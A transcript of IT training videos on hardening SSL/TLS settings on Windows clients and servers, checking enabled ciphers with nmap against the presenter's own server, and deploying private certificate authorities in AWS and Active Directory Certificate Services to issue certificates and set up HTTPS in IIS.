what's enabled for network security protocols on client web browsers and on server HTTP stacks. So you
configure SSL and TLS for a specific app. For example, if you want to configure four different web servers,
then that's four different PKI certificates. Of course, you can use wildcard certificates. But generally speaking,
it's a separate configuration for each app. Now, it uses a different port number. The default port number for
SSL or TLS is 443. It can be any port number you want, but these days that would be the norm. And that's an
HTTPS connection where an HTTP connection normally uses port 80. So what does it provide?
Well, SSL and TLS provide confidentiality in the form of encryption over the network, and also integrity and
authentication. Now depending on the software being used, we'll determine whether checking for
authentication or whether transmissions have been tampered with is actually being done. So with SSL and
TLS, there are some things to bear in mind. SSL, available since the 90s. So as you might imagine, quite old,
although there have been multiple versions up to SSL3. It is superseded by TLS, Transport Layer Security.
And so SSL should not be used at all, not even version 3. The TLS has been around since the late 1990s. Now
you should be using only TLS version 1.2 or higher where possible. Of course, depending on the client web
browsers connecting to your web server stack, it might dictate that you still support TLS 1.0 and so on. But
you do that with the understanding that you are leaving some vulnerabilities on that host if you're using that
protocol.
Now as of March 2020, major web browsers are going to start displaying deprecation warnings if a site that a
user is connecting to is not using TLS version 1.2 or higher. This is probably not something that most
organizations want their users to experience, because it erodes trust and that's the last thing that we need. So it
makes sense then, to make sure that we don't use older, insecure protocols that formerly were used ironically to
secure network connections.
Now port numbers used by SSL and TLS are different than the standard port numbers. For example, HTTPS
uses port 443. LDAPS, if you're securing LDAP connectivity, supports port 636 by default. SMTPS for mail
transfer, ports 465 and 587, POP3 for mail retrieval, port 995, and IMAPS uses port 993.
In this video, find out how to disable SSL on web clients and servers.
Objectives
[Video description begins] Topic title: Disabling SSL. The presenter is Dan Lachance. [Video description
ends]
Secure Sockets Layer or SSL is now deprecated. It should not be used because there are known vulnerabilities.
There are freely available tools available out there in the wild that can exploit SSL vulnerabilities. The irony is
in the fact that SSL is designed to protect communications over a network. SSL is a network security protocol
that uses a PKI certificate to secure for example, a web application, but it shouldn't be used. And so as a result,
we can choose to disable it, client and server side. Let's start by disabling SSL on the client side. So here on
my Windows host, I'm going to fire up a web browser, doesn't matter which one specifically.
[Video description begins] He opens the Internet Explorer browser. [Video description ends]
And there are different ways that you would arrive at this location. But here in Internet Explorer, I'll press
Alt+T to open up the Tools menu.
[Video description begins] A dialog box called "Internet Options" opens. [Video description ends]
I'm going to go down to Internet Options and I'm going to go to Advanced because at the very bottom under
the Security section, there are plenty of security options. But one of the things we want to watch out for is to
turn off SSL 3.0.
[Video description begins] In a section labeled "Security", he deselects a checkbox labeled "Use SSL
3.0". [Video description ends]
[Video description begins] He deselects checkboxes labeled "Use TLS 1.0" and "Use TLS 1.1". [Video
description ends]
We really should be using TLS, Transport Layer Security, the successor of SSL. We should be using 1.2 or
higher.
[Video description begins] He points to a checkbox labeled "Use TLS 1.2", which is preselected. [Video
description ends]
So I'm going to turn off SSL and everything below TLS version 1.2 and this is on the browser or client side.
Now on a larger scale, of course, you're not going to do this individually one by one. And of course, it might
be done differently on a Linux host versus an iPhone or an Android device. But one way or another, we want
to make sure that we turn this off because really, we don't want to allow connectivity to those sites that would
be vulnerable. So I'll click OK. However, that is only on the client side. If this same server is also a web server,
we can also disable the use of SSL on the server site for the web server stack, assuming it's a web app that is
using SSL. SSL can be used for other things as well like SMTP mail transfer, POP3 client mail retrieval, and
so on.
[Video description begins] He opens the Registry Editor window. It is divided into two parts. The first part is a
navigation pane. The second part is a content pane. [Video description ends]
You're going to need access to the Registry Editor. You can launch that from your Start menu like I've done
where you can go down under Computer, HKEY_LOCAL_MACHINE, SYSTEM, CurrentControlSet,
Control. If you go all the way down under SecurityProviders and SCHANNEL, you'll see something called
Protocols.
[Video description begins] From the navigation pane, he selects a folder labeled "Protocols" and it opens in
the content pane. [Video description ends]
Now what we want to do to make sure SSL3 is disabled is create a couple of keys and items here. So I'm going
to right click on Protocols. I'm going to choose New, Key and I'm going to call it SSL 3.0.
[Video description begins] A sub folder labeled "SSL 3.0" is added under the Protocols folder. [Video
description ends]
Now, what I want to do is create a new key within it. And I'm going to call it Server so I'm going to right click
on SSL 3, New, Key, and it's called Server.
[Video description begins] A sub folder labeled "Server" is added under the SSL 3.0 sub folder. [Video
description ends]
Now I'm going to create a new DWORD 32-bit value under there called disabled by default.
[Video description begins] A file labeled "New Value #1" appears in the content pane. The file has a value of
0. [Video description ends]
So I'll right click on Server and make a new DWORD 32 -bit value, change name here, DisabledByDefault.
[Video description begins] He renames the New Value #1 file to "DisabledByDefault". [Video description
ends]
Now, we can see that it has a value of 0. And of course, we want to make sure that we change that item. And
you just make sure that you set that to a value of 1.
[Video description begins] He double-clicks the DisabledByDefault file and its corresponding dialog box
opens. He then points to a text box labeled "Value data" with the text "1". He then clicks a button labeled
"Cancel" and the value of the DisabledByDefault file changes from '0' to '1'. [Video description ends]
Now, in that same location, you can also make another DWORD value called Enabled and make sure it's set to
0.
[Video description begins] He right-clicks the Server sub folder. A menu opens, which includes an option
labeled "New". He selects the New option and a flyout opens. It includes an option labeled "DWORD (32-bit)
Value. He selects the option and a file labeled "New Value #1" appears in the content pane. He then renames
the file to "Enabled". [Video description ends]
[Video description begins] He double-clicks the Enabled file and its corresponding dialog box opens. It
includes a text box labeled "Value" with the text "0". He then clicks a button labeled "OK" and the dialog box
closes. [Video description ends]
But because this is Server 2019, SSL is not going to be enabled anyhow, but TLS will be. Let's take a look at
that fact.
[Video description begins] He opens a window called "dlachance@kali: ~". The prompt "dlachance@kali:~$"
is displayed with the following command: nmap -sV --script ssl-enum-ciphers -p 443 3.83.64.193. [Video
description ends]
Here in Kali Linux, I'm going to use the nmap built-in tool. And I'm essentially going to call upon a script
called ssl-enum-ciphers. So what it's designed to do is to scan to see which SSL ciphers are enabled on a given
host. Now -p for port 443 because I do have a web app configured with a certificate. And here is the IP address
of my public facing web application service.
[Video description begins] In the command, he highlights 3.83.64.193. [Video description ends]
I'm going to go ahead and press Enter. And let's give it a moment to go through and enumerate through the
supported ciphers. Now even though the script has SSL in the name, it's also going to show us any TLS ciphers
that are enabled on our web application.
[Video description begins] He executes the following command: nmap -sV --script ssl-enum-ciphers -p 443
3.83.64.193. The output displays that Nmap is done and one IP address in scanned in 17.47 seconds. [Video
description ends]
So we can now see that we've got some resultant output. Let's scroll back up and check it out. Well, I don't see
any references here to SSL 3. However, I do see TLS version 1.0, TLS version 1.1. They shouldn't be used.
There are known vulnerabilities and TLS version 1.2. Well, that's good. That one doesn't have any
vulnerabilities, at least not yet. Basically, what we want to do is take this a few steps further, because on the
server we're going to turn off TLS version 1.0, TLS version 1.1. Now we're to come back and do this scan
again to see what the result is. So if I were to go ahead and add keys for TLS 1.0 and TLS 1.1, and under each
of them create a subkey called Server.
[Video description begins] He executes the following command: clear. No output returns and the screen
clears. He then switches to the Registry Editor window. [Video description ends]
And in each of those create the two DWORD values disabled by default, value of 1. Enabled value is 0. After
rebooting my Server, those ciphers will no longer be supported as evidenced if we were to run an nmap scan
after setting those and rebooting my server, which I have done.
[Video description begins] He switches to the dlachance@kali: ~ window. [Video description ends]
[Video description begins] He highlights the command: nmap -sV --script ssl-enum-ciphers -p 443
3.83.64.193. [Video description ends]
So we can now see if we run that same nmap command against the same host.
[Video description begins] In the output, he highlights "TLSv1.2:". [Video description ends]
When it enumerates the ciphers, the only thing it's going to report back in this case is TLS version 1.2.
In this video, find out how to deploy a private CA using Amazon Web Services.
Objectives
PKI certificates are digital security certificates, and they are issued from a certificate authority. Whether that
certificate authority or CA is on premises or in the Cloud. We're going to focus on cloud CAs here in Amazon
Web Services.
[Video description begins] A web page called "AWS Management Console" is open. [Video description ends]
So, to get started here in the AWS Management Console, I've signed in with my AWS account. I'm going to
search for acm, that's the Certificate Manager. I'm going to click on it to open it up.
[Video description begins] He types the text, "acm" in a search box labeled "Find Services". The result of the
search contains an option labeled "Certificate Manager". He clicks the option and its corresponding page
opens. [Video description ends]
And what I want to do is I want to deploy a new certificate authority. So I'm going to go under Private
certificate authority. Now, this means that the certificates that will be generated are from my own certificate
authority. And that means by default, devices will not trust the validity of those certificates. Devices have lists
of public certification authorities whose certificates they would trust. Now, that list can be modified on
devices, but that's just the default behavior. Private certificate authority, I'm going to go ahead and click Get
started.
[Video description begins] A page called "Create CA" opens. It is divided into two parts. The first part
includes several steps. The second part is the content pane. In the first part, a step called "Step 1: Select CA
type" is selected and its corresponding page is open in the content pane. [Video description ends]
Now, I'm going to create a root certificate authority. That's the top of the PKI hierarchy. Now, if we already
had a Root CA, we could create a Subordinate CA for a different business unit that controls its own
certificates. Or maybe for a different part of the world, different region, different country. But hearing it, leave
it on Root CA, and I'm going to click Next.
[Video description begins] In the first part, the next step called "Step 2: Configure CA subject name" is
selected and its corresponding page is open in the content pane. [Video description ends]
Then I have to fill in some values, such as the name of the Organization, an organization unit, Country name,
State or province, and so on. So I'm going to go ahead and fill that out. So now that I filled in all the details,
including the common name for the CA. I'm calling it PrivateCA1. I'm going to go ahead and click Next. I'll
accept the default key algorithm, RSA 2048-bit and I'll click Next.
[Video description begins] In the first part, the next step called "Step 3: Configure CA key algorithm" is
selected and its corresponding page is open in the content pane. [Video description ends]
I'm not going to configure a certificate revocation list or CRL, a curl, otherwise it's called.
[Video description begins] In the first part, the next step called "Step 4: Configure revocation" is selected and
its corresponding page is open in the content pane. [Video description ends]
And I could add a tag, a sort of metadata. I'm going to add name and I'm going to call it PrivateCA1.
[Video description begins] He enters the text, "Name" in a text box labeled "Tag name". He then enters the
text, "PrivateCA1" in another text box labeled "Value". [Video description ends]
So it shows up that way when I view it here in the Amazon Web Services interface.
[Video description begins] He clicks a button labeled "Next". In the first part, the next step called "Step 6:
Configure CA permissions" is selected and its corresponding page is open in the content pane. [Video
description ends]
[Video description begins] He points to a radio button labeled "Authorize ACM to use this CA for renewals",
which is preselected. [Video description ends]
Certificates have an expiration date, so I want to be able to renew them with the CA. I'll click Next.
[Video description begins] In the first part, the next step called "Step 7: Review" is selected and its
corresponding page is open in the content pane. [Video description ends]
And on the summary screen, I'm happy with this. So I'm just going to click here to confirm that I might be
charged a monthly fee, and I'll choose Confirm and create.
[Video description begins] He clicks a button labeled "Confirm and create". [Video description ends]
[Video description begins] A notification window opens, which includes the text, "Success! Your CA was
created successfully". It also includes a button labeled "Get started". [Video description ends]
It says, your CA was created successfully. Okay, well, I can click Get started.
[Video description begins] A page called "Install root CA certificate" opens. It is divided into two parts. The
first part contains two steps. The second part is the content pane. A step called "Step 1: Configure CA
Certificate" is selected in the first part and its corresponding page is open in the content pane. [Video
description ends]
And here, I can see the CA certificate parameters. So the validity is going to be for 10 years, okay? I can see
the signature algorithm here is SHA256WITHRSA, for digitally signing certificates that are issued from this
CA. I'm okay with both of these.
[Video description begins] He clicks a button labeled "Next". In the first part, the next step called "Step 2:
Review" is selected and its corresponding page is open in the content pane. [Video description ends]
So I'm just going to continue on to click next and confirm and install, to make sure that my private root CA is
ready to go.
[Video description begins] He then clicks a button labeled "Confirm and install". A page called “Private CAs”
opens. [Video description ends]
In this video, learn how to generate a server certificate from an Amazon Web Services Certificate Authority.
Objectives
[Video description begins] Topic title: Cloud PKI Certificate Issuance. The presenter is Dan Lachance. [Video
description ends]
There are a lot of different tools and methods by which you can acquire a PKI certificate. In this example, I'm
going to be requesting a private certificate from a cloud based private certificate authority. Specifically through
Amazon Web Services or AWS.
[Video description begins] The AWS Management Console web page is open. [Video description ends]
I've already got the CA, the certificate authority that issue certificates. I've already got it deployed. Let's go
take a look at it. So here in the AWS Management Console, I'm going to search for acm, and in the search
results, I'll click Certificate Manager.
[Video description begins] The corresponding page opens. [Video description ends]
On the left, if I go to private CA is indeed there's PrivateCA1 for the quick 24x7 organization and its status is
listed as active.
[Video description begins] In the navigation pane, he selects the Private CAs option and its corresponding
page opens in the content pane. [Video description ends]
It's a Root CA so it's at the very top of the PKI hierarchy. If I got to Certificate Manager over on the left, I can
click Get started and I can request either a public certificate issued by Amazon.
[Video description begins] In the navigation pane, he selects an option called “Certificate manager” and its
corresponding page opens in the content pane. A page called "Request a certificate" opens. [Video description
ends]
I don't want that, I want to request a private certificate issued by my CA. Now understand that when you
Request a private certificate for security purposes, let's say for a website, that certificate isn't going to be
trusted by anyone visiting that website. And that's because it will have been issued from a private certificate
authority which anyone can do, so where's the security? However, that's fine. We can configure devices to trust
certificates issued from a private CA if we so choose.
[Video description begins] He selects a radio button called “Request a private certificate”. [Video description
ends]
To request a private certificate, I'm going to click Request a certificate that I choose the CA from the list.
[Video description begins] A page called "Request a private certificate" opens. It is divided into two parts. The
first part includes several steps. The second part is the content pane. In the first part, a step called "Step 1:
Select CA" is selected and its corresponding page is open in the content pane. He clicks a drop-down list box
labeled "CA" and a drop-down list opens. [Video description ends]
[Video description begins] In the first part, the next step called "Step 2: Add domain names" is selected and its
corresponding page is open in the content pane. [Video description ends]
Now for the domain name here, let's say I want to secure a site, www.fakesite1.com, and then I'll click Next.
[Video description begins] In the first part, the next step called "Step 3: Add Tags" is selected and its
corresponding page is open in the content pane. [Video description ends]
And I can add some metadata here, some tags, so the name will be FakeSite1, and then I'll click Review and
request and Confirm and request.
[Video description begins] He enters the text, "Name" in a text box labeled "Tag Name". He then enters the
text, "FakeSite1" in a text box labeled "Value". [Video description ends]
Now at this point in the Certificate Manager view on the left, we can now see we've got a certificate issued for
our site.
[Video description begins] In the first part, the next step called "Step 4: Review and request" is selected and
its corresponding page is open in the content pane. [Video description ends]
[Video description begins] He clicks a button labeled "Confirm and request". A page called “Certificates”
opens. [Video description ends]
So we can go ahead and select that by putting a check mark in the box on the left.
[Video description begins] He points to the certificate and the site. [Video description ends]
And under Actions, we can export the private certificate part of that and protect it with a passphrase if we so
choose.
[Video description begins] He clicks a drop-down button labeled "Actions", which includes options labeled
"Delete" and "Export (private certificates only)". [Video description ends]
But if we're going to be using that certificate within Amazon Web Services, then we really don't have to do
anything.
[Video description begins] He selects the Export (private certificates only) option and its corresponding page
opens. [Video description ends]
We don't have to export anything because we'll be able to select it from a list.
In this video, find out how to deploy a private CA using Microsoft Certificate Services.
Objectives
[Video description begins] Topic title: On-premises Certificate Authority Deployment. The presenter is Dan
Lachance. [Video description ends]
In this demonstration, I will be installing and deploying a private CA, a certificate authority, in Windows using
Active Directory Certificate Services. So, to get started here in Windows Server 2019, we can either go the
way of PowerShell command line, so for example, Windows PowerShell.
[Video description begins] He opens a window called "Administrator: Windows PowerShell". The prompt "PS
C:\Users\Administrator>" is displayed. [Video description ends]
And here, I could, for example, get-windowsfeature, and I could ask it, let's say with wildcards around it, for
ADCS, Active Directory Certificate Services.
[Video description begins] He executes the following command: get-windowsfeature *adcs*. The output
displays a list of features available for ADCS. [Video description ends]
And I can see that all of the components that are available for Active Directory Certificate Services are shown
here, but there's no x in the box, it's not installed. So I could use either the add or install-windowsfeature
command, it doesn't matter which one, and specify the names of the components that I wish to install here in
PowerShell. And whether I want to include the Management Tools.
[Video description begins] In the output, he highlights "ADCS-Cert-Authority" and "ADCS-Enroll-Web-
Pol". [Video description ends]
But I could also do this through the Server Manager GUI. So from the Start menu, I'll click on Server
Manager. Basically, I can add the ADCS, Active Directory Certificate Services, role.
[Video description begins] A window called "Server Manager" opens. [Video description ends]
[Video description begins] A wizard called "Add Roles and Features Wizard" opens. A page called "Before
you begin" is open in the wizard. [Video description ends]
So I'm going to click Add roles and features, just going to go through the first couple of screens in the wizard,
accepting defaults until I get to Roles.
[Video description begins] He clicks a button labeled "Next" for the first few pages. A page called "Select
server roles" opens. [Video description ends]
[Video description begins] A dialog box labeled "Add Roles and Features Wizard" opens. [Video description
ends]
And it says, well, what about the Remote Server Admin Tools? Yeah, I want those too. So, I'll click Add
Features, and Next.
[Video description begins] A page called "Select features" opens in the wizard. [Video description ends]
[Video description begins] He clicks the Next button and a page called "Active Directory Certificate Services"
opens. He again clicks the Next button and a page called "Select role services" opens. [Video description ends]
All I really want is the Certification Authority. I do have some other options like Certification Authority Web
Enrollment, and so on, but I don't want those, just the Certification Authority piece.
[Video description begins] In the page, he points to a checkbox labeled "Certification Authority", which is
preselected. [Video description ends]
[Video description begins] He clicks the Next button and a page called "Confirm installation selections"
opens. He again clicks the Next button and a page called "Installation progress" opens. [Video description
ends]
And we can see that the installation has now begun. Okay, before you know it, the feature is installed, so I'm
going to go ahead and click Close. Now, this is great because we could establish our own PKI hierarchy to
issue digital security certificates to help harden our environment, if we're not already doing this. Certificates
might be issued to users or devices to authenticate to a VPN, to encrypt files, to secure connectivity to web
apps, you name it. So, now that we've got that installed, if I go to the Tools menu, we then now have a
certificate or Certification, rather, Authority, option. You can also launch that from your Start menu.
[Video description begins] He clicks an option called “Certification Authority”. A message box opens. [Video
description ends]
Now, of course, we get this message initially, it says, well, I can't manage Active Directory Certificates
Services, file not found. Okay, no problem.
[Video description begins] He clicks a button labeled "OK" and a window called "certsrv - [Certification
Authority (Local)]" opens. [Video description ends]
So it still opens up the console. Now, we don't have it configured, so there's nothing to show here in the
console, which is why it spawned that error message.
So we need to deploy a new CA. That's what this little icon is up here in the notifications area in Server
Manager up by the flag. So if I click there it says, there's a Post-Deployment Configuration, you need to
configure Active Directory Certificate Services.
[Video description begins] He points to a link labeled "Configure Active Directory Certificate Services on the
destination server". [Video description ends]
Of course we do, we can't launch the tool until there's a CA. So I'm going to ahead and click on that.
[Video description begins] He clicks the link and its corresponding wizard opens. It is divided into two parts.
The first part includes several steps. The second part is a content pane. A step labeled "Credentials" is
selected in the first part and its corresponding page is open in the content pane. [Video description ends]
And it looks like we've got the default admin credentials for this host filled in there, that's good.
[Video description begins] He highlights the text, "EC2AMAZ-E5M0CTT\Administrator" in a text box labeled
"Credentials". [Video description ends]
[Video description begins] The next step called "Role Services" is selected in the first part and its
corresponding page is open in the content pane. [Video description ends]
I'm going to select Certification Authority, so we can proceed to configure that. Now we can't have an
Enterprise CA, because the server needs to be a member of an Active Directory domain.
[Video description begins] He clicks a button labeled "Next". The next step called "Setup Type" is selected in
the first part and its corresponding page is open in the content pane. [Video description ends]
We don't have an Active Directory domain, so it's going to need to be a Standalone CA. That's fine, I'll click
Next.
[Video description begins] The next step called "CA Type" is selected in the first part and its corresponding
page is open in the content pane. [Video description ends]
You can't have a subordinate CA until you've got a root. So we're going to start off with Root, here. That's all
we're going to use.
[Video description begins] The next step called "Private Key" is selected in the first part and its corresponding
page is open in the content pane. [Video description ends]
[Video description begins] He points to a radio button labeled "Create a new private key", which is
preselected. [Video description ends]
Now, remember, the CA's private key is what gets used with a hashing algorithm, like SHA256, to digitally
sign the certificates that it issues.
[Video description begins] The next step called "Cryptography" is selected in the first part and its
corresponding page is open in the content pane. [Video description ends]
Fine, having said that, let's click Next, SHA256, all good, that's normal.
[Video description begins] He clicks the Next button. The next step called "CA Name" is selected in the first
part and its corresponding page is open in the content pane. [Video description ends]
Now we have to give a name to the CA. So I'm going to call this CA1. And then I'm going to click Next.
[Video description begins] The next step called "Validity Period" is selected in the first part and its
corresponding page is open in the content pane. [Video description ends]
The validity period for the CA certificate will be 5 years. So within that 5-year period, I need to renew it.
Depending on your organization's policy on how PKIs should be configured will determine whether you leave
that at 5 years or increase it to 10 years or reduce it, whatever the case might be. I'm going to set the default of
5 years, and I'll click Next.
[Video description begins] The next step called "Certificate Database" is selected in the first part and its
corresponding page is open in the content pane. [Video description ends]
Same on the database locations, Next, again, and we've got the summary screen.
[Video description begins] The next step called "Confirmation" is selected in the first part and its
corresponding page is open in the content pane. [Video description ends]
[Video description begins] The next step called "Progress" is selected in the first part and its corresponding
page is open in the content pane. [Video description ends]
Okay, now let's go back to the Tools menu, but this time it's going to work.
[Video description begins] He clicks a button labeled "Close" and the wizard closes. [Video description ends]
We're going to choose Certification Authority. It's not going to squawk about file not found because we have a
CA.
[Video description begins] The certsrv - [Certification Authority (Local)] window opens. It is divided into two
parts. The first part is a navigation pane, which includes a root node labeled "Certification Authority (Local)"
and a node labeled "CA1". The second part is a content pane. [Video description ends]
[Video description begins] He expands the CA1 node. It includes several folders. [Video description ends]
Now, from here, we would see any issued certificates, or anything like that. But we don't have that yet, because
all we've done at this point is deployed a private CA using Active Directory Certificate Services.
[Video description begins] Topic title: On-premises Certificate Templates. The presenter is Dan
Lachance. [Video description ends]
In this demonstration, I'm going to configure a Microsoft certificate services template. As you might guess, a
template is used as a blueprint for the issuing of certificates that have specific configurations. So on my server,
I'm going to go to the start menu, and I'm going to go down under Windows Administrative Tools. And I'm
going to launch the Certification Authority tool. I've already configured a Certificate Authority, a CA.
[Video description begins] The certsrv - [Certification Authority (Local)] window opens. [Video description
ends]
Specifically, this one is an enterprise CA. What that means is that, this server is joined to an Active Directory
domain.
[Video description begins] In the navigation pane, he points to the CA1 node. [Video description ends]
And if you want to work with templates, you're going to need to do that because if you set up a standalone CA,
or a server not joined to a domain, you won't see Certificate Templates here.
[Video description begins] He expands the CA1 node and points to a folder labeled "Certificate
Templates". [Video description ends]
Now when I go to Certificate Templates, I can see the ones that were issued and are available when certificates
get issued.
[Video description begins] He selects the Certificate Templates folder. The corresponding templates are
displayed in the content pane. He then points to the templates. [Video description ends]
But what I want to do is get a master list of all possible Certificate Templates. So I'm going to right-click on
Certificate Templates and choose Manage which is going to open a new console screen.
[Video description begins] A window called "Certificate Templates Console" opens. It displays a list of
templates. [Video description ends]
Here we have the master list I was referring to, for example, I've got a Web Server template.
[Video description begins] He highlights a template labeled "Web Server". [Video description ends]
So what you do when you want to customize this is you right-click on a template and you duplicate it, and you
make changes to it.
[Video description begins] A shortcut menu opens, which includes an option labeled "Duplicate
Template". [Video description ends]
So for example, under General, I'm going to call it Custom Web Server.
[Video description begins] He clicks the Duplicate Template option and its corresponding dialog box
opens. [Video description ends]
Maybe I want the validity period to be only one year for certificates that are issued by this particular template.
[Video description begins] He selects a tab labeled "General". [Video description ends]
I am going to change that to a 1. And we can also specify a number of other details. So, for example, under
Cryptography, we can determine the Minimum key size.
[Video description begins] He selects a tab labeled "Cryptography". [Video description ends]
The subject name, how that's specify whether it's supplied in the request, or
[Video description begins] He selects a tab labeled "Subject Name". [Video description ends]
So maybe built from the DNS name of the server in Active Directory.
[Video description begins] He selects a radio button labeled "Build from this Active Directory information"
and then clicks a drop-down list box labeled "Subject name format". A drop-down list opens. [Video
description ends]
So we can do that we can specify how the name will be generated for the subject.
[Video description begins] From the drop-down list, he selects an option labeled "DNS name". [Video
description ends]
[Video description begins] He selects a checkbox labeled "DNS name". [Video description ends]
So once we've configured all of that in the custom template, there it is listed, but what we would do is close out
of the Certificate Templates console that puts us back in just the Certification Authority tool.
[Video description begins] He clicks a button labeled "OK" and the dialog box closes. A new template labeled
"Custom Web Server" is added in the list. [Video description ends]
But we don't see the certificate here, because we need to right-click on Certificate Templates, and we need to
choose New, Certificate Template to Issue.
[Video description begins] He points to the list of templates. [Video description ends]
[Video description begins] A dialog box labeled "Enable Certificate Templates" opens. [Video description
ends]
I'll click OK, and now Custom Web Server shows up.
[Video description begins] He selects an option labeled "Custom Web Server". [Video description ends]
So now in addition to these other templates, the Custom Web Server template will be available when a
template is requested from the CA1 Certification Authority.
[Video description begins] Topic title: On-premises PKI Certificate Issuance. The presenter is Dan
Lachance . [Video description ends]
Windows computers that are joined to an Active Directory domain can be configured for certificate auto
enrollment through group policy. So in other words, they get certificates issued based on the settings in the
policy and you don't have to do anything other than configure it initially. However, you can also request a
certificate manually from a CA, which is what I'll be doing in this example. So on my server, I'm going to go
to a Command Prompt. I'm going to make sure I run that as an administrator so that it's an elevated command
prompt.
[Video description begins] The Administrator: Command Prompt window opens. The prompt "C:\Users\
Administrator>" is displayed. [Video description ends]
[Video description begins] A window called "Console1 - [Console Root]" opens. It is divided into two parts.
The first part is a navigation pane, which contains a root folder labeled "Console Root". The second part is a
content pane. [Video description ends]
From which I'll then go to File, Add/Remove Snap-in. Snap-ins, of which there are many, allow you to manage
some aspect of a Windows environment, including certificates.
[Video description begins] A dialog box labeled "Add or Remove Snap-ins" opens. [Video description ends]
[Video description begins] A wizard opens in which a page called "Certificates snap-in" is open. [Video
description ends]
[Video description begins] He selects a checkbox labeled "Computer account". [Video description ends]
It's going to be for the local computers so I will go through that and click OK.
[Video description begins] A page called "Select Computer” opens. He clicks a button labeled
"Finish". [Video description ends]
And now, Certificates for local computer shows up here in the left-hand navigator.
[Video description begins] A folder labeled "Certificates (Local Computer)" is added in the Console Root
folder. [Video description ends]
All I see here is CA1. Because the computer on which I'm doing this is actually the server were the authority,
the CA, was configured, but I don't have a computer certificate.
[Video description begins] He clicks a subfolder labeled "Certificates" in the Personal subfolder and its
details are displayed in the content pane. [Video description ends]
So I'm going to request one. I'm going to right-click on Certificates, choose All Tasks, Request New
Certificate. Next, Active Directory Enrollment Policy, okay, Next.
[Video description begins] A wizard called "Certificate Enrollment" opens. [Video description ends]
Now from here, I can see all of the templates that are available. And if I have any custom templates that I've
created, they may not show up here if the appropriate permissions were not set. For example, I have a custom
template called custom web server, but it's not showing up. Even if I choose Show all templates, I'm not going
to see it. Okay, what's the problem?
[Video description begins] The certsrv - [Certification Authority (Local)] window opens. [Video description
ends]
Well, let's Cancel out of here and let's fire up under Windows Administrative Tools from the Start menu, the
Certification Authority tool. And then in there, I can see CA1,
[Video description begins] In the navigation pane, he expands the CA1 node. [Video description ends]
[Video description begins] The Certificate Templates Console window opens. [Video description ends]
And I'm going to take a look at the Custom Web Server certificate here.
[Video description begins] He double-clicks the Custom Web Server template and its corresponding dialog
box opens. He selects a tab called “Security”. [Video description ends]
Because in the Security section, we need to make sure that we've got the ability for enrolling. So Authenticated
Users here, notice here has Read but not Enroll. Now, we're not talking about Autoenrollment through group
policy, just manual enrollment. So I'm going to turn on Enroll for Authenticated Users. Because that also
includes servers that are authenticated to Active Directory.
[Video description begins] He selects a checkbox labeled “Allow” for an option labeled “Enroll”. [Video
description ends]
And in this case, I'll click OK. Now let's flip back into what we were doing.
[Video description begins] He switches to the Console1 window in which the Certificates subfolder is
selected. [Video description ends]
We were in the midst of right-clicking here in our MMC add on. For Certificates, All Tasks, Request New
Certificate, Next, and Next.
[Video description begins] The Certificate Enrollment wizard opens. [Video description ends]
There's Custom Web Server because the enroll permission is now enabled. Perfect, okay, that's what I want.
I'm going to choose that check mark and click Enroll.
[Video description begins] In a section labeled "Active Directory Enrollment Policy", he selects a checkbox
labeled "Custom Web Server". [Video description ends]
[Video description begins] He clicks a button labeled "Finish" and the wizard closes. In the content pane, a
certificate labeled "EC2AMAZ-E5M0CTT.Domain1.Local" is added. [Video description ends]
Well, it's supposed to be. So we can see here that we've got a certificate issued to this servers name. That's the
fully qualified DNS name of this host issued by a CA called CA1.
So now, if I were to double click, let's say to take a look here, what's the purpose of the certificate?
[Video description begins] The corresponding dialog box opens. [Video description ends]
Ensures the identity of a remote computer. We can also see the validity here is only up to one year. And that
would come from the template that defines settings such as that. So at this point, we have successfully issued
an on-premises PKI certificate. And in this case, it's from a private CA with a custom template.
In this video, you will configure a Microsoft IIS web site to use a PKI certificate.
Objectives
[Video description begins] Topic title: HTTPS On-premises Web Site. The presenter is Dan Lachance. [Video
description ends]
Most modern web applications use an HTTPS connection to secure the link between a client connecting to the
app and the server itself over the internet. This is normally done with a PKI certificate instead of a VPN tunnel.
And so a PKI certificate is then assigned to that particular application, a web app, for example and away we
go. We just want to make sure that the network security protocol being used is secured. We don't want to use
SSL, we don't want to use anything less than TLS version 1.2, because they are known to have vulnerabilities.
So let's get started here configuring an HTTPS connection for a Windows IIS website. First of all on my
Windows host, I'm just going to fire up the default page here on the localhost where the web server is running,
and indeed we see it is working.
[Video description begins] He opens a web browser and then enters a URL "http://localhost/" in the address
bar. A web page called "IIS Windows Server" opens. [Video description ends]
Now that's over HTTP, if we try to do an HTTPS secured connection It's just going to timeout because we
don't have that binding configured.
[Video description begins] The Administrator: Command Prompt window opens. The prompt "C:\Users\
Administrator>" is displayed. [Video description ends]
[Video description begins] He executes the following command: mmc. No output returns and the Console1 -
[Console Root] window opens. [Video description ends]
Let's go into a command prompt here, so CMD I'm going to right-click and make sure I run it as admin.
And I'm going to run MMC, Microsoft Management Console where I'm going to go to File, Add/Remove
Snap-ins, Certificates, we'll just add that for the computer and I'll accept the rest of the defaults.
[Video description begins] The Add or Remove Snap-ins dialog box opens. [Video description ends]
And basically what I'm doing is drilling down under Certificates, Personal, Certificates to ensure that we have
a server authentication certificate that we can use.
[Video description begins] He selects an option called “Certificates” in a section called “Available snap-
ins”. He then clicks a button labeled "Add >". A wizard opens in which a page called "Certificates snap-in" is
open. He selects a checkbox labeled "Computer account". [Video description ends]
[Video description begins] He clicks a button labeled "Next" and another page opens in the wizard. He then
clicks a button labeled "Finish" and the wizard closes. He then clicks a button labeled "OK" and the dialog
box closes. In the navigation pane, the Certificates (Local Computer) folder is added in the root folder
"Console Root". [Video description ends]
That's a certificate authority and it's got the name of this host, the DNS name of this host.
[Video description begins] In the navigation pane, he selects a subfolder labeled "Certificates" and its details
open in the content pane. [Video description ends]
So now I'm going to go into the start menu under Microsoft, or rather under Windows Administrative Tools.
[Video description begins] He opens a window called "Internet Information Services (IIS) Manager". It is
divided into two parts. The first part is a navigation pane, which includes a root node labeled "Start Page".
The second part is a content pane. [Video description ends]
And I'm interested in Internet Information Services IIS. IIS Manager lets you manage aspects of your Web
Server installation here in Windows.
[Video description begins] He expands a node labeled "EC2AMAZ-E5M0CTT" under the Start Page root
node. The EC2AMAZ-E5M0CTT node includes a subnode labeled "Sites". [Video description ends]
So if I go down to Sites, there's the default site. That's great, no problem. However, we want to enable our site
for HTTPS communications.
[Video description begins] A dialog box labeled "Site Bindings" opens. [Video description ends]
So the first thing I'm going to do is right-click on the Default Web Site, and I'm going to choose Edit Bindings,
we've got a binding for Port 80.
[Video description begins] A dialog box labeled "Add Site Binding" opens. [Video description ends]
